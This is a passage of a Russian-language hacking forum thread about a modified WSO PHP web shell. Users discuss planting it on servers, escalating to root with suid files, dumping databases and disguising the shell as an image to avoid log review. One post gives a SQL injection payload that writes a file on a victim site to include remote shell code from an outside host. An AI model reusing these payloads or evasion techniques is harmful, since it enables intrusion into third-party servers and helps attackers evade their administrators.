WSO 2.5 Modified

Обсуждение в разделе «Избранное», начал(-а) randman, 6.08.2011.

  1. vobbs

    vobbs New Member

    Регистрация:
    13.12.2011
    Сообщения:
    9
    Одобрения:
    1
    Репутация:
    0
    Зачем его заливать в bin ?
     
  2. vobbs

    vobbs New Member

    Регистрация:
    13.12.2011
    Сообщения:
    9
    Одобрения:
    1
    Репутация:
    0
    попугай, я хочу рута получить имея права обычного пользователя или ноубоди, конечно же =)
     
  3. попугай

    попугай Elder - Старейшина

    Регистрация:
    15.01.2008
    Сообщения:
    1 709
    Одобрения:
    405
    Репутация:
    196

    Тебе тогда в другую тему для начала - http://forum.antichat.ru/thread296327.html

    Суидник нужен, если у тебя уже есть рут-доступ.
     
    Это одобряет 1 пользователь.
  4. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    695
    Одобрения:
    161
    Репутация:
    81
    Залей в tmp, может тебе так больше понравиться :)
    Главное ещё, чтобы файл рутом был создан.... +s права всмысле..
     
    #64 Osstudio, 30.12.2011
    В последний раз редактировалось: 31.12.2011
  5. Jopashnik

    Jopashnik New Member

    Регистрация:
    27.10.2010
    Сообщения:
    104
    Одобрения:
    3
    Репутация:
    0
    скажите вопрос такой, залить шелл залил, пытаюсь править файл .htaccess не дает, пишет правка запрещена, пытался поправить конфиг или изменить права доступа тоже не дает, что можно еще попробовать? шеллом как то поменять файл .htaccess кроме простого способа есть шанс??? или может как то изменить права на конфиг?
     
  6. OxoTnik

    OxoTnik На мышей

    Регистрация:
    10.06.2011
    Сообщения:
    1 095
    Одобрения:
    507
    Репутация:
    173
    Почему дамп БД не пашет? или только у меня так?
     
  7. Ereee

    Ereee Reservists Of Antichat

    Регистрация:
    1.12.2011
    Сообщения:
    597
    Одобрения:
    351
    Репутация:
    252
    Только у тебя.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    после редактирования файлов выдает
    Code:
    Query did not return anything
    из-за чего это?
    и да, изменения не сохраняются.
     
    _________________________
    #68 yarbabin, 13.02.2012
    В последний раз редактировалось: 13.02.2012
  9. Vladislav88

    Vladislav88 New Member

    Регистрация:
    5.12.2011
    Сообщения:
    41
    Одобрения:
    1
    Репутация:
    0
    Зарегил домен hut4.ru на сайте holm.ru , залил к себе на сайт wso , и теперь я могу видеть абсолютно все сайты зарегистрированые на hut4.ru + login (вроде больше ничего не могу делать). Это недоработки сервера или это нормально? Я новичок и не знаю , просто интересно что это значит? Заранее спасибо за ответ.
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    ну просмотр файлов, я думаю, тебе недоступен :)
    это нормально
     
    _________________________
  11. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 646
    Одобрения:
    666
    Репутация:
    833
    А ты при дампе укажи в названии файла диру куда надо дамп положить, например

    /tmp/wso-22323.zip

    Абсолютно нормальная ситуация, не нормально, если при этом ядро старое и дырявое)
     
    _________________________
  12. n4yk

    n4yk New Member

    Регистрация:
    15.09.2011
    Сообщения:
    2
    Одобрения:
    0
    Репутация:
    0
    Тыц

    Было бы неплохо доработать шелл, или выпустить альтернативную версию чтобы параметры передавались не постом а через СOOKIE, думаю на JavaScript пару минут скриптик написать чтобы при клике вызывалась функция с параметрами, которая установит новое значение куки и обновит страницу чтобы они передались.
    P.S. плюсов от этого будет много) к примеру шелл замаскирован под картинку, и в логах админ в 2 счета поймет что Запись вида "POST /images/lalala.jpg" выглядит подозрительной))
    можно даже обратно передавать данные через Set-Cookie:,
    и тогда не будет меняться размер файла при выдаче, т.к. если подряд идет обращение к одной картинке, у которой в логах каждый раз новый размер тоже вызывает подозрения)) думаю лучше всего если выпустить просто альтернативную версию аля "Cookie Edition", в которой будут только основные функции, которые можно реализовать через куки (само собой файлы заливать через куки не катит)))

    P.S. Надеюсь меня услышат, спасибо)
     
  13. comcord

    comcord New Member

    Регистрация:
    2.04.2012
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    0
    Бредовый метод. Мне кажется что в r57 лучше поправить функцию ex (добавить ./suid) и юзать на здоровье. Потому как там список файлов через ls -lua выводится.
     
  14. Nek1t

    Nek1t Elder - Старейшина

    Регистрация:
    7.03.2008
    Сообщения:
    193
    Одобрения:
    16
    Репутация:
    1
    При работе через suid-файл есть проблемы с редактированием файлов, размер которых > ~5 Кб. Выводится чистая страница с "Query did not return anything". Это как-нибудь фиксится?
     
  15. mrfreeze

    mrfreeze New Member

    Регистрация:
    4.04.2012
    Сообщения:
    30
    Одобрения:
    0
    Репутация:
    0
    Пытаюсь залить через скул, вбиваю запрос
    Code:
    union select '<? @include("http://mysite/shell.php"); ?>' into outfile '/var/www/htdocs/404.php'
    Захожу на http://www.victim.com/404.php, мне вылезает 404. Куда он девается?
     
    #75 mrfreeze, 22.07.2012
    В последний раз редактировалось: 22.07.2012
  16. roflzi

    roflzi New Member

    Регистрация:
    16.04.2010
    Сообщения:
    43
    Одобрения:
    0
    Репутация:
    0
    Господ ТС, интересует следующий вопрос:

    был ли исправлен баг при базе данных с таблицами, содержащими пробелы в имени?
    В оригинальном ВСО sql браузер просто фейлит конкретно, если такие таблицы присутствуют...

    Проблема в передачe count(*), нужно брать имена таблиц в кавычки при обращении select .. from 'table name'...
     
  17. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 646
    Одобрения:
    666
    Репутация:
    833
    Попробуй PAS как альтернативу... В WSO не сталкмвался с таким багом...
     
    _________________________
  18. roflzi

    roflzi New Member

    Регистрация:
    16.04.2010
    Сообщения:
    43
    Одобрения:
    0
    Репутация:
    0
    Дорогой элито-бир, величайший автор рдп брут PRIV8 (здравствуй, давно не виделись)

    1) В данном топике я хотел бы обсудить конкретно WSO, а не нечто другое (PAS в данный момент меня не интересует, я знаю что это).
    2) Меня не особо интересует что ты не встречался с данным вопросом, т.к. просто руки не доходили или ещё почему либо, в то время как баг присутствует и я предлагаю его фикс.

    По-этому прошу не офтопить, хотя бы потому, что мой конкретный вопрос был адресован к ТС.
    Спасибо
     
  19. dean999

    dean999 New Member

    Регистрация:
    16.05.2012
    Сообщения:
    79
    Одобрения:
    1
    Репутация:
    0
    Можно инструкцию по поводу "Suid" в WSO?
     
  20. Sat-hacker

    Sat-hacker New Member

    Регистрация:
    19.05.2012
    Сообщения:
    121
    Одобрения:
    0
    Репутация:
    -10
    зачем нужен wso2_pack.php в архиве?